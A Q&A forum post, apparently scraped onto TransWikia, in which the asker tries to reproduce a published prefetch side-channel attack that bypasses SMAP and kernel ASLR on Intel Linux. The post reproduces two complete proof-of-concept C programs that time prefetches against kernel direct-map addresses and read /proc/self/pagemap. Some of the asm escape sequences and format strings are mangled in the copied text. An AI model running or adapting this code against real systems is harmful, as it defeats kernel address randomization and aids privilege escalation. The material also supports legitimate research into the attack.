TransWikia.com

Prefetch Side-Channel Attacks:Bypassing SMAP and Kernel ASLR

Information Security Asked on December 28, 2021

I’m trying to understand and perform the Prefetch Side-Channel Attacks:Bypassing SMAP and Kernel ASLR. The author have released the proof-of-concept code.
I’m trying to run the attack on my Intel Haswell machine, using Linux Ubuntu 20.04, 64-bit.

This attack is based on two property:

  • Property 1 The execution time of prefetch instructions varies
    depending on the state of various CPU internal caches.
  • Property 2 Prefetch instructions do not perform any privilege checks.

The attack has three steps based on the paper:

  1. Flush address p
  2. Prefetch (inaccessible) address p’
  3. Reload p

*Note that p and p’ have the same page offset. (As the page offset is identical for physical and virtual pages, in the below code by only checking the possible offsets based on the known page size, the attacker reduces the number of addresses to check to a minimum.)

My main questions are:

  1. which part of the code is referring to the inaccessible address? I assume it should be iaddr. But how is this calculated and why is it considered inaccessible region?

    uint64_t iaddr = 0xffff880000000000ull + map[0];

  2. Which part is showing the leaked data?

  3. How is the virt address calculated?

    void* virt = (void*)(((size_t)array+(6+1)10241024) >> 21 << 21);

  4. Why do we need threads in this attack? (I think it has something to do with forcing the to context switch between kernel and the attack process but I’m not sure how exactly it is supposed to work in this attack.)

  5. Why do we need to perform sched_yield() before prefetching?

  6. I understand 4096 is the page size but why are we iterating 64 times 4096?

    for (size_t phys = iaddr – 644096; phys < iaddr + 644096; phys +=
    4096)

There are two main codes in the repository that I’m sharing. Here is the v2p.c code under nacl, in this url: https://github.com/IAIK/prefetch/tree/master/nacl/v2p Compiling and running this on my machine throws an exception. (My guess is everything under nacl folder is for test on windows, but I’m not sure how I can modify this for Linux)

#define _GNU_SOURCE
#include <pthread.h>
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>


uint64_t map[16];
char* array;
size_t hit_histogram[1000*1000];
size_t miss_histogram[1000*1000];
volatile size_t evict_array[2*1024*1024];

#define ADDR_COUNT (16)
uint64_t* eset[ADDR_COUNT];

int g_pagemap_fd = -1;

#define assert(X) do { if (!(X)) { fprintf(stderr,"assertion '" #X "' failedn"); exit(-1); } } while (0)

#define maccess(X) (*(volatile size_t*)X)


inline __attribute__((always_inline)) void prefetch(uint64_t p)
{
    //__builtin_prefetch((void*)p, 0, 0); //prefetchnta 
    //__builtin_prefetch((void*)p, 0, 1); //prefetcht2     
    asm volatile ("prefetchnta (%0)" : : "r" (p));
    asm volatile ("prefetcht2 (%0)" : : "r" (p));
}

uint64_t evict_all(uint64_t phys)
{
  uint64_t sum = -1ULL;
  asm volatile ("mfencent");
  for(size_t i=0; i<2*1024*1024; i += 64/sizeof(size_t))
  {
    sum += evict_array[i]++;
  }
  asm volatile ("mfencent");
  return sum;
}

inline __attribute__((always_inline)) uint64_t _rdtsc_begin() {
  uint64_t a, d;
  asm volatile ("mfencent"
    "xor %%rax, %%raxnt"
    "cpuidnt"
    "rdtscnt"
    "mov %%rdx, %0nt"
    "mov %%rax, %1nt"
    "mfencent"
    : "=r" (d), "=r" (a)
    :
    : "%rax", "%rbx", "%rcx", "%rdx");
  a = (d<<32) | a;
  return a;
}

inline __attribute__((always_inline)) uint64_t _rdtsc_end() {
  uint64_t a, d;
  asm volatile("mfencent"
    "rdtscnt"
    "mov %%rdx, %0nt"
    "mov %%rax, %1nt"
    "xor %%rax, %%raxnt"
    "cpuidnt"
    "mfencent"
    : "=r" (d), "=r" (a)
    :
    : "%rax", "%rbx", "%rcx", "%rdx");
  a = (d<<32) | a;
  return a;
}


uint64_t get_physical_addr(void* virtual_addr_p) {
  uint64_t start = (uint64_t)(((uint32_t)array+(6+2)*1024*1024) >> 21 << 21);  
  uint64_t offset = ((uint64_t)(uint32_t)virtual_addr_p) - start;
  offset /= 2*1024*1024;
  assert(offset < 8);
  return map[offset] + (((uint64_t)(uint32_t)virtual_addr_p) & (2*1024*1024-1));
}

int get_cache_slice(uint64_t phys_addr, int bad_bit) {

  // XOR of h1 and h2:
  static const int h0[] = { 6, 10, 12, 14, 16, 17, 18, 20, 22, 24, 25, 26, 27, 28, 30, 32, 33, 35, 36 };

  int count = sizeof(h0) / sizeof(h0[0]);
  int hash = 0;
  for (int i = 0; i < count; i++) {
    hash ^= (phys_addr >> h0[i]) & 1;
  }
  return hash;
}

size_t in_same_cache_set(uint64_t phys1, uint64_t phys2, int bad_bit) {
  // For Sandy Bridge, the bottom 17 bits determine the cache set
  // within the cache slice (or the location within a cache line).
  uint64_t mask = ((uint64_t) 1 << 17) - 1;
  return ((phys1 & mask) == (phys2 & mask) &&
          get_cache_slice(phys1, bad_bit) == get_cache_slice(phys2, bad_bit));
}


void pick(uint64_t paddr,char* max)
{
  size_t found = 0;
  char* i = (char*)((((size_t)array)+(2+6)*1024*1024) >> 21 << 21);
  while (found < ADDR_COUNT)
  {
    for (; i < max; i += 64)
    {
      fflush(stdout);
      uint64_t paddr2 = get_physical_addr(i);
      if (paddr != paddr2 && in_same_cache_set(paddr, paddr2, -1)) {
        eset[found] = (uint64_t*)i;
        printf("found %p -> %llxn",i,paddr2);
        found++;
      }
      if (found >= ADDR_COUNT)
        break;
    }
  }
}

inline __attribute__((always_inline)) size_t onlyreload(void* addr, uint64_t phys)
{
  _rdtsc_begin();
  // Three shall be the number thou shalt count, and the number of the counting shall be three. Four shalt thou not count, neither count thou two, excepting that thou then proceed to three.
  for (size_t i = 0; i < 3; ++i)
  {
    sched_yield();
    prefetch(phys);
  }
  size_t time = _rdtsc_begin();
  maccess(addr);
  size_t delta = _rdtsc_end() - time;
  evict_all(phys);
  return delta;
}

inline __attribute__((always_inline)) size_t flushandreload(void* addr, uint64_t phys)
{
  size_t time = _rdtsc_begin();
  maccess(addr);
  size_t delta = _rdtsc_end() - time;
  evict_all(phys);
  return delta;
}

pthread_t nopthread[4];

void* noploop()
{
  while(1)
    asm("nop");
}

#define TRIES (1024)

int main(int argc, char** argv)
{
  //pthread_create(nopthread+0,0,noploop,0);
  
  unsigned long long i;
  for(i=0; i<1024*1024; i++)
  {
    evict_array[i] = i;
  }
  char* line;
  size_t n;
  
  array = mmap(NULL, 1024*1024*1024, PROT_READ | PROT_WRITE, MAP_POPULATE | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
  char* p = (void*)((size_t)array+2*1024*1024 >> 21 << 21);
  printf("ready?n");
  fflush(stdout);
  getchar();

  printf("skip %pn",p);
  memset(p,-1,1*1024*1024);
  p += 1*1024*1024;
  printf("skip %pn",p);
  memset(p,-1,1*1024*1024);
  p += 1*1024*1024;
  printf("skip %pn",p);
  memset(p,-1,1*1024*1024);
  p += 1*1024*1024;
  printf("skip %pn",p);
  memset(p,-1,1*1024*1024);
  p += 1*1024*1024;
  printf("skip %pn",p);
  memset(p,-1,1*1024*1024);
  p += 1*1024*1024;
  printf("skip %pn",p);
  memset(p,-1,1*1024*1024);
  p += 1*1024*1024;
  
  size_t map_cntr = 0;
  while (map_cntr < 1)
  {
    printf("what is the address of %p?n",p);
    fflush(stdout);
    memset(p,-1,2*1024*1024);
    getline(&line,&n,stdin);
    if (!((line[0] >= '0' && line[0] <= '9') || (line[0] >= 'a' && line[0] <= 'f')))
      map[map_cntr++] = 0;
    else
    {
      char* end = 0;
      map[map_cntr++] = strtoull(line,&end,16);
      printf("-> stored %llxn",map[map_cntr-1]);
    }
    p += 2*1024*1024;
  }

  memset(array,-1,1024*1024*1024);

  uint64_t iaddr = 0xffff880000000000ull + map[0];

  
  void* virt = (void*)(((size_t)array+(6+1)*1024*1024) >> 21 << 21);

  printf("%16p -> %16llx -> %16llxn",virt,map[0], iaddr);
//  pick(map[3],virt);

  memset(array,-1,1024*1024*1024);
  maccess(virt);
  
while (1)
{
  printf("ready?n");
  fflush(stdout);
  getchar();

  for (uint64_t phys = iaddr - 4*2*1024*1024; phys < iaddr + 4*2*1024*1024; phys += 2*1024*1024)
  {
    virt = (void*)((((size_t)virt >> 21) << 21) | ((uint32_t)phys & (2*1024*1024-1)));
    memset(hit_histogram,0,1000000*sizeof(size_t));
    memset(miss_histogram,0,1000000*sizeof(size_t));
    ssize_t i = TRIES;
    size_t d = onlyreload(virt,phys);
    while (i-- > 0)
    {
      d = onlyreload(virt,(uint64_t)(uint32_t)virt);
      hit_histogram[d]++;
      if (d > 250)
        continue;
    }
    i = 2048;
/*    while (i-- > 0)*/
/*    {*/
/*      size_t d = flushandreload(virt,phys);*/
/*      miss_histogram[d]++;*/
/*    }*/
sched_yield();
    size_t hit_min_i = -1;
    size_t miss_min_i = 12000;
    size_t hit_sum = 0;
    size_t miss_sum = 0;
    for (size_t i = 0; i < 200; ++i)
    {
      //printf("%8zu: %8zun",i,hit_histogram[i]);
      hit_sum += hit_histogram[i];
      miss_sum += hit_histogram[i] * i;
      if (hit_min_i > i && hit_histogram[i] > 0)
        hit_min_i = i;
      if (miss_min_i > i && miss_histogram[i] > 0)
        miss_min_i = i;
    }

//    printf("%16p,%16zx,%8zu,%8zun",virt,phys,hit_min_i,hit_sum);
//    if (hit_min_i < 200)
      printf("%16p vs. %16zx%s: hit: %8zu (%8zu, avg: %8zu)n",virt,phys,phys == iaddr ? "*":" ",hit_min_i,hit_sum,miss_sum/hit_sum);
/*    else
    {
      if (iaddr == phys)
        printf("*");
      else
        printf(".");
    }*/
    fflush(stdout);
    /*if((phys/(4*1024))%512 > 0)
    {
      phys = (((phys >> 21) + 1) << 21) - 4*1024;
    }*/
  }
}
  return 0;
}

The output:

ready?
yes
skip 0x7f485c000000
skip 0x7f485c100000
skip 0x7f485c200000
skip 0x7f485c300000
skip 0x7f485c400000
skip 0x7f485c500000
what is the address of 0x7f485c600000?
-> stored e
  0x7f485c400000 ->                e -> ffff88000000000e
ready?
yes
Floating point exception (core dumped)

The following source code run without any problem but I can’t say if the output means the data leaked or not. Here is the v2p.c code in this url: https://github.com/IAIK/prefetch/blob/master/v2p/v2p.c

#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sched.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <pthread.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/mman.h>
#include "../cacheutils.h"

size_t hit_histogram[1000*1000];
size_t miss_histogram[1000*1000];

int g_pagemap_fd = -1;

#define assert(X) do { if (!(X)) { fprintf(stderr,"assertion '" #X "' failedn"); exit(-1); } } while (0)

inline __attribute__((always_inline)) void prefetch(size_t p)
{
  asm volatile ("prefetchnta (%0)" : : "r" (p));
  asm volatile ("prefetcht2 (%0)" : : "r" (p));
}

inline __attribute__((always_inline)) uint64_t _rdtsc_begin() {
  uint64_t a, d;
  asm volatile ("mfencent"
    "xor %%rax, %%raxnt"
    "CPUIDnt"
    "RDTSCPnt"
    "mov %%rdx, %0nt"
    "mov %%rax, %1nt"
    "mfencent"
    : "=r" (d), "=r" (a)
    :
    : "%rax", "%rbx", "%rcx", "%rdx");
  a = (d<<32) | a;
  return a;
}

inline __attribute__((always_inline)) uint64_t _rdtsc_end() {
  uint64_t a, d;
  asm volatile("mfencent"
    "RDTSCPnt"
    "mov %%rdx, %0nt"
    "mov %%rax, %1nt"
    "xor %%rax, %%raxnt"
    "CPUIDnt"
    "mfencent"
    : "=r" (d), "=r" (a)
    :
    : "%rax", "%rbx", "%rcx", "%rdx");
  a = (d<<32) | a;
  return a;
}

void init_pagemap() {
  g_pagemap_fd = open("/proc/self/pagemap", O_RDONLY);
  assert(g_pagemap_fd >= 0);
}

size_t get_physical_addr(void* virtual_addr_p) {
  maccess(virtual_addr_p);
  _rdtsc_begin();
  uint64_t virtual_addr = (uint64_t)virtual_addr_p;
  size_t value;
  off_t offset = (virtual_addr / 4096) * sizeof(value);
  int got = pread(g_pagemap_fd, &value, sizeof(value), offset);
  return value;
}

int get_cache_slice(uint64_t phys_addr, int bad_bit) {
  // On a 4-core machine, the CPU's hash function produces a 2-bit
  // cache slice number, where the two bits are defined by "h1" and
  // "h2":
  //
  // h1 function:
  //   static const int bits[] = { 18, 19, 21, 23, 25, 27, 29, 30, 31 };
  // h2 function:
  //   static const int bits[] = { 17, 19, 20, 21, 22, 23, 24, 26, 28, 29, 31 };
  //
  // This hash function is described in the paper "Practical Timing
  // Side Channel Attacks Against Kernel Space ASLR".
  //
  // On a 2-core machine, the CPU's hash function produces a 1-bit
  // cache slice number which appears to be the XOR of h1 and h2.

  // XOR of h1 and h2:
  static const int h0[] = { 6, 10, 12, 14, 16, 17, 18, 20, 22, 24, 25, 26, 27, 28, 30, 32, 33, 35, 36 };
  static const int h1[] = { 7, 11, 13, 15, 17, 19, 20, 21, 22, 23, 24, 26, 28, 29, 31, 33, 34, 35, 37 };

  int count = sizeof(h0) / sizeof(h0[0]);
  int hash = 0;
  for (int i = 0; i < count; i++) {
    hash ^= (phys_addr >> h0[i]) & 1;
  }
  return hash;
}

size_t in_same_cache_set(uint64_t phys1, uint64_t phys2, int bad_bit) {
  // For Sandy Bridge, the bottom 17 bits determine the cache set
  // within the cache slice (or the location within a cache line).
  uint64_t mask = ((uint64_t) 1 << 17) - 1;
  return ((phys1 & mask) == (phys2 & mask) &&
          get_cache_slice(phys1, bad_bit) == get_cache_slice(phys2, bad_bit));
}

volatile size_t* e_array;

volatile size_t* e_set[1024*1024];
size_t e_cnt = 0;
size_t e_to_evict = 0;

void evict2mtlb()
{
  if (e_cnt == 0)
  {
    e_array = (volatile size_t*)mmap(NULL, 2ull*1024*1024*1024, PROT_READ | PROT_WRITE, MAP_POPULATE | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    size_t e_offset = 0;
    while (e_cnt < 64)
    {
/*      size_t pte = get_physical_addr(e_array + e_offset);
      size_t offset = ((size_t)(e_array + e_offset)) & 0xFFF;
      size_t paddr = (pte << 12) | offset;
      if (in_same_cache_set(e_to_evict,paddr,-1))
      {
        e_set[e_cnt] = e_array + e_offset;
        e_cnt++;
        printf("%zun",e_cnt);
      }
      e_offset += 8;*/
      // 2m pages
      e_set[e_cnt] = e_array + e_offset;
      e_cnt++;
      e_offset += 262144;
    }
  }
  for (size_t i = 0; i < e_cnt; i++)
  {
    *e_set[i] += 1;
  }
}

inline __attribute__((always_inline)) size_t onlyreload(void* addr, size_t phys)
{
_rdtsc_begin();
  // Three shall be the number thou shalt count, and the number of the counting shall be three. Four shalt thou not count, neither count thou two, excepting that thou then proceed to three.
  for (size_t i = 0; i < 3; ++i)
  {
    sched_yield();
    prefetch(phys);
  }
  size_t time = _rdtsc_begin();
  maccess(addr);
  size_t delta = _rdtsc_end() - time;
  flush(addr);
  return delta;
}

inline __attribute__((always_inline)) size_t flushandreload(void* addr, size_t phys)
{
  size_t time = _rdtsc_begin();
  maccess(addr);
  size_t delta = _rdtsc_end() - time;
  flush(addr);
  return delta;
}

#define TRIES (64*1024)

pthread_t nopthread[4];

void noploop()
{
  while(1)
    asm("nop");
}

int main(int argc, char** argv)
{
  pthread_create(nopthread+0,0,noploop,0);
  init_pagemap();
  void* array = mmap(NULL, 1024*1024*1024, PROT_READ | PROT_WRITE, MAP_POPULATE | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
  void* virt = (void*)((size_t)array+2*1024*1024 >> 21 << 21);
  maccess(virt);
  size_t pte = get_physical_addr(virt);
  size_t offset = ((size_t)virt) & 0x1FFFFF;
  assert(offset == 0);
  size_t paddr = pte << 12;
  e_to_evict = paddr;
  size_t iaddr = paddr + 0xffff880000000000ull;
  printf("%16p -> %zx -> %zx -> %zxn",virt,pte,paddr, iaddr);
  //for (size_t phys = 0xffff880000000000ull; phys < 0xffff880000000000ull + 12ull*1024*1024*1024; phys += 2*1024*1024)
  for (size_t phys = iaddr - 64*4096; phys < iaddr + 64*4096; phys += 4096)
  //for (size_t phys = 0xffff880000000000ull; phys < iaddr + 128*1024*1024; phys += 2*1024*1024)
  //size_t phys = iaddr; while (1)
  {
    memset(hit_histogram,0,1000000*sizeof(size_t));
    memset(miss_histogram,0,1000000*sizeof(size_t));
    ssize_t i = TRIES;
    size_t d = onlyreload(virt,phys);
    while (i-- > 0)
    {
      size_t d = onlyreload(virt,phys);
      hit_histogram[d]++;
      if (d > 250)
        continue;
      else if (d < 200)
        break;
    }
    i = 2048;
    while (i-- > 0)
    {
      size_t d = flushandreload(virt,phys);
      miss_histogram[d]++;
    }
    size_t hit_min_i = -1ULL;
    size_t miss_min_i = 12000;
    size_t hit_sum = 0;
    size_t miss_sum = 0;
    for (size_t i = 0; i < 1000000; ++i)
    {
      hit_sum += hit_histogram[i];
      miss_sum += miss_histogram[i];
      if (hit_min_i > i && hit_histogram[i] > 0)
        hit_min_i = i;
      if (miss_min_i > i && miss_histogram[i] > 0)
        miss_min_i = i;
    }
    //for (size_t i = 0; i < 400; ++i)
    //  printf("%3zu: %8zu %8zun",i,hit_histogram[i],miss_histogram[i]);
    printf("n%16p,%16zx,%8zu,%8zun",virt,phys,hit_min_i,hit_sum);
    if (hit_min_i < 200)
      printf("n%16p vs. %16zx%s: hit: %8zu (%8zu) miss: %8zu (%8zu)n",virt,phys,phys == iaddr ? "*":" ",hit_min_i,hit_sum,miss_min_i,miss_sum);
    else
    {
      if (iaddr == phys)
        printf("*");
      else
        printf(".");
    }
    fflush(stdout);
    //if (hit_min_i != miss_min_i)
  }
  return 0;
}

program outputs a * means the the iaddr == phys at some iteration.

0x7ff4a7a00000 -> 8180000000000000 -> 0 -> ffff880000000000
................................................................*...............................................................

It is not clear which of the above codes are the complete attack.

Some comments about the prefetch function(T2 and NTA are used here):

  1. T0 (temporal data)—prefetch data into all levels of the cache
    hierarchy.
  2. T1 (temporal data with respect to first level cache misses)—prefetch data into level 2 cache and higher.
  3. T2 (temporal data with respect to second level cache misses)—prefetch data into level 3 cache and higher, or an implementation-specific choice.
  4. NTA (non-temporal data with respect to all cache levels)—prefetch data into non-temporal cache structure and into a
    location close to the processor, minimizing cache pollution.

This attack is trying to recover the translation level to defeat ASLR. The paper says "attacker can now accurately determine which addresses are mapped to physical memory by locating libraries and drivers in the inaccessible memory region." So is my understanding correct:

  1. The goal is to recover the "virtual address" mapped to each inaccessible physical address
  2. Since prefetch instruction is based on the virtual address and does not check the previlage, so the user(attacker) can iterate through all the memory(virtual address space) and prefetch in to the cache (including the inaccessible address) even though it can’t read them.
  3. While the user doesn’t have access to certain blocks prefetched into the cache, but it can time every prefetch instruction and since the timing of prefetch instruction varies depending on hit or miss, the attacker can find which physical address was prefetched and thus retrieving the virtual to physical address translation. (I don’t see where in the code this step is happening?)

Add your own answers!

Ask a Question

Get help from others!

© 2024 TransWikia.com. All rights reserved. Sites we Love: PCI Database, UKBizDB, Menu Kuliner, Sharing RPP